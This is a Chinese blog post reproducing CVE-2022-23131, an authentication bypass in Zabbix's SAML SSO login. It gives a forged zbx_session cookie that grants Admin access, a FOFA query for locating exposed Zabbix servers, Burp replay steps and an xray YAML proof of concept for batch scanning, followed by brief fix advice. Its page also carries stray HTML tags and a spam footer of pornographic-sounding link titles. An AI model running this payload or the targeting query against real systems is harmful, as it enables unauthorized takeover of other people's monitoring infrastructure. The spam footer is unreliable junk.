<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          CVE-2022-23131漏洞復(fù)現(xiàn) | 身份認(rèn)證繞過

          共 1751字,需瀏覽 4分鐘

           ·

          2022-03-01 14:57

          本文來自“白帽子社區(qū)知識星球”

          作者:B1anda0



          白帽子社區(qū)知識星球

          加入星球,共同進步
          01

          漏洞成因


          在啟用 SAML SSO 身份驗證(非默認(rèn))的情況下,惡意攻擊者可以修改會話數(shù)據(jù) 來實現(xiàn)身份認(rèn)證繞過。未經(jīng)身份驗證的惡意攻擊者可能會利用此問題來提升權(quán)限并獲 得對 Zabbix 前端的管理員訪問權(quán)限。?


          該漏洞存在于index_sso.php文件中,由于index_sso.php文件未調(diào)用

          CEncryptedCookieSession::checkSign()

          方法對cookie進行校驗,且客戶端的cookie可被偽造。


          從index_sso.php文件中可以看出,當(dāng)偽造的cookie中存在saml_data時,獲取 username_attribute的數(shù)據(jù),如果該用戶真實存在則會生成一個sessionid從而實現(xiàn)身份 認(rèn)證繞過。



          payload:

          Cookie:zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9



          受影響版本:?

          zabbix 5.4.0 - 5.4.8

          zabbix 6.0.0alpha1


          02

          漏洞復(fù)現(xiàn)


          fofa:app="ZABBIX-監(jiān)控系統(tǒng)" && body="saml"



          burp抓包將請求路徑文件改為index_sso.php , Cookie替換為:


          zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9


          放包即可繞過身份認(rèn)證




          xray批量檢測poc:

          name: poc-yaml-zabbix-saml-cve-2022-23131
          manual: true
          transport: http
          rules:
          r0:
          request:
          cache: true
          method: GET
          path: /index_sso.php
          headers:
          Cookie:
          zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRta
          W4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
          follow_redirects: false
          expression: response.status == 302 &&
          response.headers["location"] == "zabbix.php?
          action=dashboard.view"
          expression: r0()
          detail:
          author: B1anda0(https://github.com/B1anda0)
          links:
          - https://blog.sonarsource.com/zabbix-case-study-ofunsafe-session-storag


          檢測效果:



          03

          修復(fù)方案


          1、禁用 SAML 身份驗證?


          2、升級安全版本:

          https://support.zabbix.com/browse/ZBX-20350


          參考鏈接:

          https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storagehttps://y4er.com/post/cve-2022-23131-zabbix-web-frontend-bypassing-the-saml-sso-authentication/


          如果覺得本文不錯的話,歡迎加入知識星球,星球內(nèi)部設(shè)立了多個技術(shù)版塊,目前涵蓋“WEB安全”、“內(nèi)網(wǎng)滲透”、“CTF技術(shù)區(qū)”、“漏洞分析”、“工具分享”五大類,還可以與嘉賓大佬們接觸,在線答疑、互相探討。



          ▼掃碼關(guān)注白帽子社區(qū)公眾號&加入知識星球▼


          瀏覽 235
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  欧美精品三级片 | A∨免费在线 | 欧美一级久久 | 狠狠五月| 欧美日韩国产性爱 |